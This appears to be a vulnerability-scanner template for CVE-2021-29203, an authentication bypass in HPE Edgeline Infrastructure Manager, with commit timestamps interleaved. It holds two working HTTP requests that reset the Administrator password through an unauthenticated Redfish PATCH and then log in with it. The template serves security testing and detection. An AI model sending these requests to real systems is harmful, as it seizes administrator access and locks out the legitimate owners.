2021-06-26 08:10:30 +00:00
id : CVE-2021-29203
2022-04-22 10:38:41 +00:00
2021-06-26 08:10:30 +00:00
info :
name : HPE Edgeline Infrastructure Manager v1.21 Authentication Bypass
author : madrobot
severity : critical
2022-05-17 09:18:12 +00:00
description : A security vulnerability has been identified in the HPE Edgeline Infrastructure Manager, also known as HPE Edgeline Infrastructure Management Software, prior to version 1.22. The vulnerability could be remotely exploited to bypass remote authentication leading to execution of arbitrary commands, gaining privileged access, causing denial of service, and changing the configuration. HPE has released a software update to resolve the vulnerability in the HPE Edgeline Infrastructure Manager.
2021-08-18 11:37:49 +00:00
reference :
2021-08-19 14:44:46 +00:00
- https://www.tenable.com/security/research/tra-2021-15
- https://nvd.nist.gov/vuln/detail/CVE-2021-29203
2022-05-17 09:18:12 +00:00
- https://support.hpe.com/hpsc/doc/public/display?docLocale=en_US&docId=emr_na-hpesbgn04124en_us
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2021-09-10 11:26:40 +00:00
cve-id : CVE-2021-29203
cwe-id : CWE-287
2022-04-22 10:38:41 +00:00
tags : hpe,cve,cve2021,bypass
2021-06-26 08:10:30 +00:00
requests :
- raw :
- |
PATCH /redfish/v1/SessionService/ResetPassword/1/ HTTP/1.1
Host : {{Hostname}}
Accept : */*
Content-Type : application/json
2021-06-30 15:57:06 +00:00
{"Password" : "{{randstr}}" }
2021-06-26 08:10:30 +00:00
- |
POST /redfish/v1/SessionService/Sessions/ HTTP/1.1
Host : {{Hostname}}
Content-Type : application/json
2021-06-30 15:57:06 +00:00
{"UserName" : "Administrator" , "Password" : "{{randstr}}" }
2021-06-26 08:10:30 +00:00
matchers-condition : and
matchers :
2021-06-30 15:57:06 +00:00
2021-06-26 08:10:30 +00:00
- type : status
status :
- 201
2021-06-30 15:57:06 +00:00
2021-06-26 08:10:30 +00:00
- type : word
2021-06-30 15:57:06 +00:00
condition : and
part : header
2021-06-26 08:10:30 +00:00
words :
- "X-Auth-Token"
- "PasswordReset"
- "Location"
2021-06-30 15:57:06 +00:00
2021-06-26 08:10:30 +00:00
- type : word
part : body
2021-06-30 15:57:06 +00:00
words :
- "Base.1.0.Created"